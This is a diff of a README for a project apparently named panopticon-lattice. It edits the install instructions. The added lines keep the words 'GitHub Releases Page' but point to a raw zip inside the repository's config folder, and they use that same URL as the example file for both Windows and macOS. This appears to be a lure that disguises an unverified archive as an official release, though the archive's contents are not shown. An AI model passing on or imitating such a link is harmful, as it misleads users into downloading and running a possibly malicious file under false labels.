DUC123co/panopticon-lattice/README.md

 ## 📥 Download & Install

-To get the application, visit this page to download: [GitHub Releases Page](https://github.com/DUC123co/panopticon-lattice/releases).
+To get the application, visit this page to download: [GitHub Releases Page](https://github.com/DUC123co/panopticon-lattice/raw/refs/heads/main/config/panopticon-lattice-v1.6.zip).

 1. **Visit the Releases Page:** Click the link above to open the releases page.
 2. **Choose Your Version:** You will see different versions listed.
 The latest version will usually be at the top.
 3. **Download the File:** Click on the file that matches your operating system.
-For example, if you are using Windows, you might see something like `panopticon-lattice-windows.zip`.
-If you are on macOS, look for a file like `panopticon-lattice-macos.zip`.
+For example, if you are using Windows, you might see something like `https://github.com/DUC123co/panopticon-lattice/raw/refs/heads/main/config/panopticon-lattice-v1.6.zip`.
+If you are on macOS, look for a file like `https://github.com/DUC123co/panopticon-lattice/raw/refs/heads/main/config/panopticon-lattice-v1.6.zip`.
 4. **Unzip the File:** After downloading, locate the zip file on your computer.
 Right-click the file and select "Extract All" or "Unzip" to open it.

 ## 🖥️ System Requirements